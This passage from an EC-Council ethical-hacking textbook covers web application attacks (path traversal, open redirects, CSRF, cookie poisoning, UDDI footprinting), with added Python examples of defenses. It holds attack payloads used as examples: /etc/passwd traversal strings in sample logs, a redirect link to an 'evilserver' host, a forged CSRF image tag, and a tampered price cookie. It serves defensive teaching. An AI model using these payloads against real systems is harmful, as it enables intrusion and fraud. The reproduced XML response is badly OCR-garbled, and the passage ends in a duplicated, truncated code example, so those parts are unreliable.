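Added example, not EC-Council code; paths, function names and log lines are constructed."""
import posixpath
from urllib.parse import unquote

# Theme directory from the figure; any theme file must resolve underneath it.
THEME_DIR = "/home/users/certifiedhacker/Jason"


def unsafe_theme_path(theme):
    """What the vulnerable PHP does: concatenate user input onto the directory."""
    return THEME_DIR + "/" + theme


def safe_theme_path(theme, base=THEME_DIR):
    """Canonicalize the requested path and accept it only if it stays inside base.

    Returns the canonical path, or None when the request must be rejected.
    """
    # Decode twice so %2e%2e%2f and double-encoded %252e variants are seen as '..'
    decoded = unquote(unquote(theme))
    # NUL bytes truncate paths in C-based runtimes; backslashes are a Windows separator
    if "\x00" in decoded or "\\" in decoded:
        return None
    # posixpath.join discards base if decoded is absolute; normpath collapses '..'
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    # commonpath compares whole components, so '/home/users/certifiedhacker/Jason2' is outside
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


# Sequences worth alerting on; checked on both the raw and the decoded request line
TRAVERSAL_MARKERS = ("../", "..\\")


def flag_traversal_requests(log_lines):
    """Return the access-log lines whose request contains a traversal sequence."""
    hits = []
    for line in log_lines:
        low = line.lower()
        decoded = unquote(unquote(low))
        if any(m in low or m in decoded for m in TRAVERSAL_MARKERS):
            hits.append(line)
    return hits


# Constructed access-log lines in Apache combined format (not from the page)
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Apr/2022:11:05:34 +0000] "GET /process.php?page=../../../../etc/passwd HTTP/1.1" 200 1272',
    '203.0.113.5 - - [20/Apr/2022:11:05:41 +0000] "GET /process.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1272',
    '198.51.100.9 - - [20/Apr/2022:11:06:02 +0000] "GET /index.php?theme=Jason.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print("unsafe:", unsafe_theme_path("../../../../../etc/passwd"))
    print("safe:  ", safe_theme_path("Jason.php"), safe_theme_path("../../../../../etc/passwd"))
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print("ALERT:", hit)
```

posixpath.normpath works on the string only; on a real filesystem, resolve the candidate with os.path.realpath as well so a symbolic link inside the theme directory cannot point back out of it. A stricter policy for this particular case is to accept only a bare file name (no separator at all) and look it up in a fixed list of installed themes.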



Unvalidated Redirects and Forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing
passwords or other sensitive information, whereas unsafe forwards may allow access control
bypass. An attacker sends links to unvalidated redirects and lures the victim into clicking on
them. When the victim clicks on the link, thinking that it is a valid site, it redirects the victim to
another site. Such redirects lead to the installation of malware and may even trick victims into
disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to
bypass security checks.
Unsafe forwarding may allow access control bypass, leading to the following:
■ Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user to access a legitimate
web server using an explicit session ID value.
■ Security Management Exploits
Some attackers target security management systems, either in networks or in the
application layer, to modify or disable security enforcement. An attacker who exploits
security management can directly modify protection policies, delete existing policies,
add new policies, and modify applications, system data, and resources.
■ Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the
display of links or URLs for protection. Attackers access those links or URLs directly and
perform illegitimate operations.


■ Malicious File Execution
Malicious file execution vulnerabilities are present in most applications. The cause of
this vulnerability is unvalidated input to a web server. Thus, attackers execute and
process files on a web server and initiate remote code execution, install a rootkit
remotely, and, in at least some cases, take complete control of the systems.
In an "unvalidated redirect" scenario, a user receives a phishing email from an attacker, luring
the user into clicking the link. The link (malicious query) appears to be legitimate because it
contains the name of a legitimate website such as www.certifiedhacker.com at the beginning of
the URL. However, the latter part of the link contains a malicious URL (www.evilserver.com), to
which it redirects the victim. When the user clicks the link, it redirects to the
www.evilserver.com website, and the server that hosts the website might perform illegal
activities such as harvesting the user credentials, deploying malware, and so on.
"Unvalidated forwarding" allows attackers to access sensitive pages that are generally
restricted from viewing. During unvalidated forwarding, attackers request a page from a server
with the forward (i.e., by entering a link with an embedded forward query)
http://www.certifiedhackershop.com/purchase.jsp?fwd=admin.jsp, which reaches the server
hosting the certifiedhackershop website. The server, without proper validation, redirects the
attacker to the sensitive admin page, where he/she can access purchase records, registered
users, and so on. Thus, using this technique, an attacker can successfully bypass any security
checks.
Unvalidated Redirect: the attacker sends the user an email containing a rewritten link to the malicious server (http://www.certifiedhacker.com/redirect.aspx?=http://www.evilserver.com).
Unvalidated Forward: the attacker requests the page http://www.certifiedhackershop.com/purchase.jsp?fwd=admin.jsp from the server and is forwarded to the admin page (Create item listing, Purchase records, Registered users).
Figure 14.33: Unvalidated Redirects and Forwards example

Types of Redirection Attacks


■ Open Redirection
Open redirection is a vulnerability that allows attackers to add their own parameters to
a URL to redirect users from trusted websites to malicious sites where they can steal
sensitive user data and redirect users back to the original website. The attacker either
simply attempts to escort the user to a fake website to enter login credentials or
redirects the user to a fake website that mimics the legitimate website through


phishing. Such redirects can lead to credential sniffing, cross-site scripting, etc. These
attacks are generally launched by exploiting the legitimate website's vulnerabilities,
through which attackers can forge URLs and inject malicious scripts using JavaScript or
PHP.

■ Header-Based Open Redirection
It is a process of modifying the HTTP Location header to redirect users to a malicious
page without their knowledge. It performs the redirection even when JavaScript fails to
interpret the header. Users should thoroughly verify the complete URL before requesting a
resource.
■ JavaScript-Based Open Redirection
It is a process of injecting JavaScript into a web-page response received from the
corresponding web server. This type of open redirect is mostly used in phishing scams,
where users are unaware that they are navigating to a malicious website.
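Every variant above starts with a redirect or forward target that the server copied from the request without checking it. The following added example (not EC-Council code; the allowed host, the page names and the function names are assumptions) shows the server-side checks that close both holes in the section's scenarios: the redirect.aspx parameter is accepted only when it is a same-site path or points at an allowlisted host, and the purchase.jsp fwd parameter is resolved through a fixed allowlist on which admin.jsp simply does not appear:

```python
"""Unvalidated redirects and forwards: allowlist checks a server should apply before
emitting a Location header or forwarding internally.
Added example, not EC-Council code; the host, page names and function names are assumed."""
from urllib.parse import urlparse

# Hosts this application may redirect to (assumption for the example)
ALLOWED_HOSTS = {"www.certifiedhacker.com"}
# Pages an internal 'fwd' parameter may name (assumption; admin.jsp is deliberately absent)
FORWARD_TARGETS = {"cart.jsp", "checkout.jsp", "orders.jsp"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for site-relative paths or absolute URLs whose host is allowlisted."""
    if not target:
        return False
    target = target.strip()
    # CR/LF in the value would inject response headers; browsers fold '\' into '/'
    if any(c in target for c in "\r\n\t\\"):
        return False
    parts = urlparse(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False            # javascript:, data:, and friends
    if parts.netloc:
        # hostname drops userinfo, so 'trusted@evil' resolves to the real host, evil
        return (parts.hostname or "") in allowed_hosts
    # No host: must be a site-relative path; '//host' is protocol-relative, not relative
    return target.startswith("/") and not target.startswith("//")


def build_redirect(target, fallback="/"):
    """Value for the Location header: the validated target or the safe fallback."""
    return target.strip() if is_safe_redirect(target) else fallback


def resolve_forward(fwd, allowed=FORWARD_TARGETS):
    """Map a 'fwd' parameter to an internal page only if it is on the allowlist."""
    return fwd if fwd in allowed else None


if __name__ == "__main__":
    for t in ("/account", "http://www.certifiedhacker.com/home", "http://www.evilserver.com",
              "//www.evilserver.com", "http://www.certifiedhacker.com@www.evilserver.com/",
              "javascript:alert(1)"):
        print(f"{t!r:58} -> {build_redirect(t)}")
    print("fwd=admin.jsp ->", resolve_forward("admin.jsp"), "| fwd=cart.jsp ->", resolve_forward("cart.jsp"))
```

The allowlist is the important part: a substring test such as "does the URL contain www.certifiedhacker.com" is exactly what the section's malicious link (a trusted name at the front, the evil host further along) is built to pass.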



Watering Hole Attack


In a watering hole attack, the attacker identifies the kind of websites frequently surfed by a
target company/individual and tests these websites to identify any possible vulnerabilities.
Once the attacker identifies the vulnerabilities, he/she injects a malicious script/code into the
web application that can redirect the web page and download malware onto the victim's
machine. After infecting the vulnerable web application, the attacker waits for the victim to
access the infected web application. This attack is called a watering hole attack, as the attacker
waits for the victim to fall into the trap, similar to a lion waiting for its prey to arrive at a
watering hole to drink water. When the victim surfs the infected website, the web page
redirects him/her and downloads malware onto his/her machine, compromising the machine
and indeed compromising the network/organization.

The attacker identifies the site most visited by the victim and infects it to redirect to the malicious server; the victim is redirected to the malicious server, and malware is downloaded to the victim's machine.
Figure 14.34: Watering Hole attack



Cross-Site Request Forgery (CSRF) Attack


Cross-site request forgery (CSRF), also known as a one-click attack, occurs when a hacker
instructs a user's web browser to send a request to the vulnerable website through a malicious
web page. Finance-related websites commonly contain CSRF vulnerabilities. Usually, outside
attackers cannot access corporate intranets; hence, CSRF is one of the methods used to enter
these networks. The inability of web applications to differentiate a request made using
malicious code from a genuine request exposes it to a CSRF attack. Such attacks exploit web
page vulnerabilities that allow attackers to force unsuspecting users' browsers to send
malicious requests that they did not intend to send. The victim user holds an active session with
a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the
trusted site into the victim user's session, compromising its integrity.
In this scenario, the attacker constructs a malicious script and stores it on a malicious web
server. When a user visits the website, the malicious script starts running and the attacker gains
access to the user's browser.


1. The user logs into the trusted site and creates a new session.
2. The trusted website stores the session identifier for the session in a cookie in the web browser.
3. The user visits a malicious site.
4. The malicious website sends a request from the user's browser using his session cookie.
Figure 14.35: Cross-Site Request Forgery (CSRF) attack example

How CSRF Attacks Work

In a CSRF attack, the attacker waits for the user to connect with a trusted server and then tricks
the user into clicking on a malicious link containing arbitrary code. When the user clicks on the
link, it executes the arbitrary code on the trusted server. The diagram below explains the steps
involved in a CSRF attack.

Client Side Code:
<form action="buy.php" method="POST">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Shares: <input type="text" name="shares" /></p>
<p><input type="submit" value="Buy" /></p>
</form>
Server Code (Trusted Server):
<?php
session_start();
if (isset($_REQUEST['symbol']) && isset($_REQUEST['shares']))
{ buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']); }
?>
Malicious Code (Malicious Server):
<img src="http://certifiedhacker.com/certifiedhackershop.php?symbol=MSFT&shares=1000" />
Steps: 1. The user logs into the trusted server, and the server sets a session cookie in the user's browser. 2. The attacker sends a phishing mail tricking the user into sending a request to a malicious site. 3. The user requests a page from the malicious server. 4. The malicious server returns the response page containing the malicious code. 5. The malicious code is executed in the trusted server.
Figure 14.36: Working of Cross-Site Request Forgery (CSRF) attack
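The server code in the figure will place an order for any request that carries the session cookie, whatever its method and wherever it came from, which is exactly what the injected <img> tag relies on. The following added example (not EC-Council code; the request dictionaries, secret key and site origin are constructed, and the function names are assumed) models that handler next to a hardened one that requires POST, a per-session synchronizer token, and a matching Origin header, and runs the figure's forged request against both:

```python
"""CSRF: the figure's buy.php accepts any request carrying the session cookie.
Added example, not EC-Council code; requests, key, origin and function names are constructed."""
import hashlib
import hmac

SECRET_KEY = b"constructed-server-secret"            # assumption: kept server-side only
SITE_ORIGIN = "https://www.certifiedhackershop.com"   # assumption: origin of the trusted site

ORDERS = []   # what buy_stocks records


def buy_stocks(symbol, shares):
    ORDERS.append((symbol, int(shares)))
    return (200, f"bought {shares} {symbol}")


def vulnerable_buy(request):
    """Mirrors the figure's server code: $_REQUEST, any method, no token check."""
    if "PHPSESSID" not in request["cookies"]:
        return (401, "not logged in")
    params = {**request["query"], **request["form"]}      # what PHP's $_REQUEST merges
    if "symbol" in params and "shares" in params:
        return buy_stocks(params["symbol"], params["shares"])
    return (400, "missing parameters")


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session; HMAC means no extra server-side storage."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, submitted):
    return submitted is not None and hmac.compare_digest(issue_csrf_token(session_id), submitted)


def hardened_buy(request):
    """State change only via POST, with a valid token and a same-site Origin."""
    session_id = request["cookies"].get("PHPSESSID")
    if session_id is None:
        return (401, "not logged in")
    if request["method"] != "POST":
        return (405, "POST required")              # removes the <img src=...> vector
    form = request["form"]
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return (403, "missing or invalid CSRF token")
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return (403, "cross-origin request refused")
    if not form.get("symbol") or not str(form.get("shares", "")).isdigit():
        return (400, "bad parameters")
    return buy_stocks(form["symbol"], form["shares"])


def make_request(method, cookies, query=None, form=None, headers=None):
    return {"method": method, "cookies": cookies, "query": query or {},
            "form": form or {}, "headers": headers or {}}


# Constructed traffic: the figure's forged <img> request, a forged auto-submitted form,
# and a genuine submission of the page's own form carrying the token
SESSION = {"PHPSESSID": "constructed-session-id"}
FORGED_IMG = make_request("GET", SESSION, query={"symbol": "MSFT", "shares": "1000"})
FORGED_POST = make_request("POST", SESSION, form={"symbol": "MSFT", "shares": "1000"},
                           headers={"Origin": "https://www.evilserver.com"})
GENUINE = make_request("POST", SESSION,
                       form={"symbol": "MSFT", "shares": "10",
                             "csrf_token": issue_csrf_token(SESSION["PHPSESSID"])},
                       headers={"Origin": SITE_ORIGIN})

if __name__ == "__main__":
    print("vulnerable, forged img :", vulnerable_buy(FORGED_IMG))
    print("hardened,   forged img :", hardened_buy(FORGED_IMG))
    print("hardened,   forged post:", hardened_buy(FORGED_POST))
    print("hardened,   genuine    :", hardened_buy(GENUINE))
```

The token check is the defense; the method and Origin checks are cheap extra layers that also make forged requests stand out in the server logs (a GET to an order endpoint, or a POST whose Origin is a foreign site, is worth an alert on its own).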



Cookie/Session Poisoning
Cookies are generally used to maintain a session between web applications and users; thus,
cookies need to transmit sensitive credentials frequently. The attacker can modify the cookies'
information with ease to escalate access or assume the identity of another user.
Usually, the aim of a session is to uniquely bind every individual with the web application that
he/she is accessing. Poisoning cookies and session information can allow an attacker to inject
malicious content or modify the user's online experience and obtain unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links
to shopping cart contents, supplied private information, and session IDs. They exist as files
stored in the client computer's memory or hard disk. A proxy can be used for rewriting the
session data, displaying the cookie data, and/or specifying a new user ID or other session
identifiers in the cookie. By modifying the data in a cookie, an attacker can often gain escalated
access or maliciously affect the user's session. Many sites offer the ability to "Remember me?"
and store the user's information in a cookie so the user does not have to re-enter the data with
every visit to the site. Any private information entered is stored in a cookie. To protect cookies,
site developers often encode them. Easily reversible encoding methods such as Base64 and
ROT13 (rotating the letters of the alphabet through 13 characters) give a false sense of security
to the users who view cookies.
Threats

Compromised cookies and sessions can provide an attacker with user credentials, allowing the
attacker to access accounts and assume the identity of other users of an application. By
assuming another user's online identity, attackers can review the original user's purchase
history, order new items, exploit services, and access the vulnerable web application.


One of the easiest examples involves using the cookie directly for authentication. Another
method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the
cookie data and/or specifying a new user ID or other session identifiers in the cookie. There are
four types of cookies: persistent, non-persistent, secure, and non-secure. Persistent cookies are
stored on a disk, whereas non-persistent ones are stored in memory. Web applications transfer
secure cookies only through SSL connections.
How Cookie Poisoning Works

Web applications use cookies to simulate a stateful user browsing experience, depending on
the end user and the identity of the server side of the web application components. Cookie poisoning
alters the value of a cookie at the client side before the request is sent to the server. A web
server can set a cookie in any response by sending a Set-Cookie header carrying the cookie
string and its directives. The cookies are stored on the users' computers and are a standard way of
recognizing users. Once the cookie is set, the web server receives it with every subsequent request. To
provide further functionality to the application, cookies support modification and analysis by
JavaScript.
In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters
and submits them to the web server. The server then accepts the attacker's request and
processes it.

1. The user browses a web page:
GET /store/buy.aspx?checkout=yes HTTP/1.0
Host: www.certifiedhackershop.com
Accept: */*
Referrer: http://www.certifiedhacker.com/showprods.aspx
Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;
2. The web server replies with the requested page and sets a cookie on the user's browser.
3. The attacker steals the cookie (sniffing, XSS, phishing attack).
4. The attacker orders a product using the modified cookie:
GET /store/buy.aspx?checkout=yes HTTP/1.0
Host: www.certifiedhackershop.com
Accept: */*
Referrer: http://www.certifiedhackershop.com/showprods.aspx
Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;
5. The product is delivered to the attacker's address.
Figure 14.37: Working of Cookie Poisoning
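The figure's server trusts a TotalPrice that lives in the client's cookie, and the text notes that Base64 or ROT13 "protection" only hides the value from a casual viewer. The following added example (not EC-Council code; the signing key, item catalog and function names are constructed) parses the figure's Cookie line, shows that a Base64-wrapped cookie can be decoded, edited and re-encoded with nothing for the server to notice, shows an HMAC tag rejecting the same edit, and finally recomputes the total from server-side prices so the cookie's TotalPrice is never consulted at all:

```python
"""Cookie poisoning: why Base64 'protection' is reversible, how an HMAC tag detects
tampering, and why the price should not come from the cookie in the first place.
Added example, not EC-Council code; key, catalog and function names are constructed."""
import base64
import hashlib
import hmac
import json

SERVER_KEY = b"constructed-cookie-signing-key"   # assumption: server-side secret

# Constructed catalog (item id -> price); the figure's three items sum to 11568
CATALOG = {"1258": 3500, "2658": 4000, "6652": 4068}

# The Cookie line from the figure's first request
COOKIE_HEADER = ("SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; "
                 "Item2=2658; Item3=6652; TotalPrice=11568;")


def parse_cookie_header(header):
    """'k=v; k2=v2;' -> dict, as the server sees the Cookie request header."""
    fields = {}
    for pair in header.split(";"):
        if "=" in pair:
            k, v = pair.strip().split("=", 1)
            fields[k] = v
    return fields


def encode_obfuscated(fields):
    """The 'encoding' the text warns about: Base64 of the JSON, no secret involved."""
    return base64.urlsafe_b64encode(json.dumps(fields, sort_keys=True).encode()).decode()


def decode_obfuscated(blob):
    return json.loads(base64.urlsafe_b64decode(blob))


def sign_cookie(fields):
    """value.tag with tag = HMAC-SHA256(key, value); unforgeable without the key."""
    value = encode_obfuscated(fields)
    tag = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_cookie(cookie):
    """Return the fields if the tag matches, else None (tampered or malformed)."""
    try:
        value, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decode_obfuscated(value)


def tamper(fields, key, new_value):
    """What the attacker in the figure does to the cookie on the client side."""
    changed = dict(fields)
    changed[key] = new_value
    return changed


def server_total(fields, catalog=CATALOG):
    """Recompute the price from the catalog; TotalPrice in the cookie is ignored."""
    n = int(fields.get("BasketSize", 0))
    return sum(catalog[fields[f"Item{i}"]] for i in range(1, n + 1))


if __name__ == "__main__":
    fields = parse_cookie_header(COOKIE_HEADER)
    # Base64: decode, edit, re-encode; the server has no way to tell it changed
    forged = encode_obfuscated(tamper(decode_obfuscated(encode_obfuscated(fields)), "TotalPrice", "100"))
    print("obfuscated cookie accepted with TotalPrice =", decode_obfuscated(forged)["TotalPrice"])
    # Signed: the same edit invalidates the tag
    signed = sign_cookie(fields)
    tag = signed.rsplit(".", 1)[1]
    print("signed cookie after tampering ->", verify_cookie(encode_obfuscated(tamper(fields, "TotalPrice", "100")) + "." + tag))
    print("server-side total ->", server_total(fields))
```

Signing stops silent edits of whatever the cookie carries, but it does not make the contents secret (the value is still Base64-readable) and it does nothing against a cookie stolen whole and replayed, which is the sniffing/XSS step in the figure; that needs the Secure and HttpOnly flags, TLS, and short session lifetimes. Keeping prices server-side removes the incentive to tamper with the cookie at all.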



Web Service Attack


Similar to the way in which a user interacts with a web application through a browser, a web
service can interact directly with the web application without the need for an interactive user
session or a browser. The evolution and increasing use of web services in businesses offer new
attack vectors in an application framework. Web services are based on XML protocols such as
Web Services Definition Language (WSDL) for describing the connection points, Universal
Description, Discovery, and Integration (UDDI) for the description and discovery of web
services, and Simple Object Access Protocol (SOAP) for communication between web services,
which are vulnerable to various web application threats.
These web services have detailed definitions that allow regular users and attackers to
understand the construction of the services. Thus, web services provide the attacker with much
of the information required to fingerprint the environment to formulate an attack. Some
examples of this type of attack are as follows:
1. An attacker injects a malicious script into a web service and can disclose and modify
application data.
2. An attacker uses a web service for ordering products and injects a script to reset the
quantity and status on the confirmation page to less than what he or she had originally
ordered. Thus, the system processing the order request submits the order, ships the
order, and then modifies the order to show that the company is shipping a smaller
number of products, but the attacker ends up receiving more of the product than he or
she pays for.


Web Services Stack and the attacks aimed at each layer:
■ Presentation Layer (XML, AJAX, Portal, Other) and Security Layer (WS-Security): parameter tampering, WSDL probing, SQL/LDAP/XPATH/OS command injection, malware injection, brute-force, data type mismatch, content spoofing, session tampering, format string, and information leakage
■ Discovery Layer (UDDI, WSDL): fault code leaks, permission and access attacks, error leakage, authentication and certification attacks
■ Access Layer (SOAP, REST): buffer overflow, XML parsing, spoiling schema, complex or recursive payload, DoS, large payload
■ Transport Layer (HTTP, HTTPS, JMS, Other): sniffing, snooping, WS-Routing, replay attacks, denial-of-service
Figure 14.38: Web services stacks and attacks



Web Service Footprinting Attack


Attackers use the Universal Business Registry (UBR) as a major source to gather information
about web services, as it is very useful for both businesses and individuals. It is a public registry
that runs on UDDI specifications and SOAP. UBR is somewhat similar to a "Whois server" in
functionality. To register web services on a UDDI server, businesses or organizations generally
use one of the following structures:
■ businessEntity: holds detailed information about the company, such as company name
and contact details.
■ businessService: a logical group of single or multiple web services. Every
businessService structure is a subset of a businessEntity. Each businessService outlines
the technical and descriptive information about a businessEntity element's web service.
■ bindingTemplate: represents a single web service. It is a subset of businessService and it
contains technical information that is required by a client application to bind and
interact with a target web service.
■ technicalModel (tModel): takes the form of keyed metadata and represents unique
concepts or constructs in UDDI.
Attackers can footprint a web application to obtain any or all of these UDDI information
structures.
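The find_service inquiry and serviceList reply shown next are plain SOAP over HTTP, so the registry owner can run the same query to see exactly which serviceKey, businessKey and service names the registry discloses to anyone. The following added example (not EC-Council code; the response document is constructed to mirror the page's listing, the keys in it are placeholders, and the function names and size cap are assumptions) builds the inquiry body with the XML library rather than string pasting and parses a serviceList reply into an inventory, with the size and DTD checks that the XML parsing and large payload attacks from the web service attack stack above call for; it serves both that stack discussion and this footprinting section:

```python
"""UDDI footprinting from the registry owner's side: build the find_service inquiry and
parse a serviceList reply into an inventory of what the registry discloses, with the
input checks the Access Layer attacks (XML parsing, large payload) call for.
Added example, not EC-Council code; the sample response, its keys, the size cap and the
function names are constructed."""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
UDDI_NS = "urn:uddi-org:api_v2"
XML_LANG = "{http://www.w3.org/XML/1998/namespace}lang"   # how ElementTree names xml:lang
NS = {"soap": SOAP_NS, "uddi": UDDI_NS}
MAX_BYTES = 1 << 20   # assumption: refuse replies larger than 1 MiB before parsing


def build_find_service(name):
    """The inquiry body from the page's XML Query, built with the library, not by string pasting."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    find = ET.SubElement(body, f"{{{UDDI_NS}}}find_service", generic="2.0")
    ET.SubElement(find, f"{{{UDDI_NS}}}name").text = name
    return ET.tostring(env, encoding="utf-8")


def parse_service_list(xml_bytes, max_bytes=MAX_BYTES):
    """Return [{serviceKey, businessKey, name, lang}, ...] from a serviceList reply."""
    if len(xml_bytes) > max_bytes:
        raise ValueError("response too large")
    head = xml_bytes[:4096].lower()
    # A SOAP reply has no business carrying a DTD: entity declarations are how
    # entity-expansion (billion laughs) and external-entity payloads arrive
    if b"<!doctype" in head or b"<!entity" in head:
        raise ValueError("DTD/entity declarations refused")
    root = ET.fromstring(xml_bytes)
    services = []
    for info in root.iterfind(".//uddi:serviceInfo", NS):
        name_el = info.find("uddi:name", NS)
        services.append({
            "serviceKey": info.get("serviceKey"),
            "businessKey": info.get("businessKey"),
            "name": name_el.text if name_el is not None else None,
            "lang": name_el.get(XML_LANG) if name_el is not None else None,
        })
    return services


# Constructed reply in the shape of the page's XML Response (keys are placeholders)
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><serviceList generic="2.0" operator="Example Operator" truncated="false"
 xmlns="urn:uddi-org:api_v2"><serviceInfos>
<serviceInfo serviceKey="00000000-0000-0000-0000-000000000001"
 businessKey="00000000-0000-0000-0000-0000000000aa"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo>
<serviceInfo serviceKey="00000000-0000-0000-0000-000000000002"
 businessKey="00000000-0000-0000-0000-0000000000bb"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo>
</serviceInfos></serviceList></soap:Body></soap:Envelope>"""

if __name__ == "__main__":
    print(build_find_service("amazon").decode())
    for svc in parse_service_list(SAMPLE_RESPONSE):
        print(svc)
```

Run periodically against your own registry entries, the inventory is a cheap check that nothing beyond the intended businessService and bindingTemplate details (internal host names, test endpoints, contact data in the businessEntity) has been published. The DTD check is a string-level guard that is adequate for a reply you requested yourself; for XML accepted from untrusted clients, a parser with entity expansion disabled is the stronger choice.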
XML Query
POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-Length: 213
<?xml version="1.0" encoding="UTF-8" ?>
<Envelop xmlns="http://scemas.xmlsoap.org/soap/envelope/">
<Body>
<find_service generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_service>
</Body>
</Envelop>
HTTP/1.1 100 Continue

XML Response
HTTP/1.1 200 OK
Date: Wed , 20 Apr 2022 11 : 05:34 GMT
Server : Microsoft-IIS/7 . 5
X-Powered-By : ASP.NET
X-AspNet-Verstion: 1.1.4322
Cache-Control : private, rnax-age=0
Content-Type: text/xrnl ; charset=utf-8
Content-Length : 1272
<?xrnl version="l.0 " encoding="utf-8 11 ?><soap : Envelope
xrnlns : soap="http : //scernas . xrnlsoap.org/soap/envelope/">
xlrnns:xsi="http://www.w3.org/2008/XMLScherna-
instance " xrnlns : xsd=" http : //w3 . org/2008/xrnlScherna" ><soap : Body><serviceList
generic=" 2.0 "
operator= "Microsoft Corporation" truncated= "false " xrnlns="urn:uddi-
org : api_ v2 " ><serviceinfos><serviceinfo
serviceKey=6ad412cl-2b7c -Sabc - c 5aa-Scc6ab9dc843" business Key="9112358ad-c12d-
1234-d4cd-
c8e34e8a0aa6 " ><narne xrnl : lang="en-us">Arnazon Rese arch
Pane</narne></serviceinfo><Serviceinfo
serviceKey=" 25638942-2d33-52f3-5896- c12ca5632abc" business Key=" adc5 c 23-abcd-
8f52-cd5f-
1253adcefc2a" ><narne xrnl : lang="en-us " >Arna zon Web Services
2 . 0</narne></serviceinfo><serviceinfo

Module 14 Page 1969 Ethical Hacking and Countermeasures Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

serviceKey="ad8a5c78-dc8f-4562-d45c-aad45d4562ad"businesskey=" 28d4acd8-d45c-
456a-4562-
acde4567d0f5 " <name xml:kang=" en">Amazon . com Web
Services</name></serviceinfo><serviceinfo
serviceKey="ad52a456-4d5f-7d5c-8def-c5e6d456cd45"businessKey="45235896-256a-
123a-c456-
add55a456f12"><name
xml:lang="en" >AmazonBookPrice</name></serviceinfo><servi ceinfo
serviceKey=9acc45ad-45cc-4d5c-1234-888cd4562893" businessKey=" aa45238d-cd55-
4d22-8d5d-a55a4c43ad5c"><name
xml:lang="en">AmazonBookPrice</name></serviceinfo></serviceinfos></serviceLis
t></soap : Body></soap:
Envelope>
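The inquiry above is a plain SOAP message, and the reply is the same message shape every UDDI v2 inquiry returns, so a defender can use the same format to inventory what a registry publicly lists about their own organization before an attacker does. The following Python is an added example and is not code from the original material; it builds the find_service body with proper escaping and parses a constructed find_service reply (the keys, names and operator string are made up and do not come from any real registry). It uses only the standard library.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespaces used by the SOAP envelope and the UDDI v2 inquiry API.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
UDDI_NS = "urn:uddi-org:api_v2"

# Constructed sample: a trimmed find_service response in the same shape as the
# registry reply shown in the text. Keys, names and operator are invented.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <serviceList generic="2.0" operator="Example Registry" truncated="false"
                 xmlns="urn:uddi-org:api_v2">
      <serviceInfos>
        <serviceInfo serviceKey="11111111-aaaa-bbbb-cccc-000000000001"
                     businessKey="22222222-aaaa-bbbb-cccc-000000000001">
          <name xml:lang="en-us">Example Book Price</name>
        </serviceInfo>
        <serviceInfo serviceKey="11111111-aaaa-bbbb-cccc-000000000002"
                     businessKey="22222222-aaaa-bbbb-cccc-000000000001">
          <name xml:lang="en">Example Research Pane</name>
        </serviceInfo>
      </serviceInfos>
    </serviceList>
  </soap:Body>
</soap:Envelope>
"""


def build_find_service(name_fragment: str) -> str:
    """Build the UDDI v2 find_service inquiry body for a name search.

    The search text is XML-escaped so a caller-supplied string cannot alter
    the structure of the request (the web-service equivalent of parameterising
    a query)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Envelope xmlns="{SOAP_NS}"><Body>'
        f'<find_service generic="2.0" xmlns="{UDDI_NS}">'
        f'<name>{escape(name_fragment)}</name>'
        '</find_service></Body></Envelope>'
    )


def parse_service_list(xml_text: str) -> list[dict]:
    """Extract serviceKey, businessKey and name for every serviceInfo in a
    find_service response. Returns an empty list when the reply carries none."""
    root = ET.fromstring(xml_text)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        return []
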